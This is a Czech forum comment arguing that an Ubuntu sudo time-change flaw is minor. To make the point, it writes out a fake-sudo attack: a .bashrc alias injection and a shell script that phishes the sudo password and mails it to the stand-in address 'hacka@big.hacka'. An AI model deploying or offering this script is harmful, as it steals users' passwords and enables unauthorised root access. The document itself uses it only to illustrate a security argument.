Názor ke zprávičce Ubuntu má už dva roky sudo zranitelné změnou času od Ondřej Surý - Je to asi taková zranitelnost jako: echo "alias sudo=/tmp/mysudo"...
-
Je to asi taková zranitelnost jako:
echo "alias sudo=/tmp/mysudo" >> ~/.bashrc
kde /tmp/mysudo je script na téma:
#!/bin/sh cat <<EOF We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for ondrej: EOF read -s PASSWORD echo $PASSWORD | mail -s "Sudo for $USER" hacka@big.hacka sleep 5 exec /usr/bin/sudo $@Jasně, že se banner vypíše i podruhé, ale:
1) kdo si toho všimne...
2) už je stejně pozděPokud se útočník dostane k odemčenému desktopu účtu, který má přístup na roota, tak je to jen variace na téma "jak dlouho to bude trvat"...
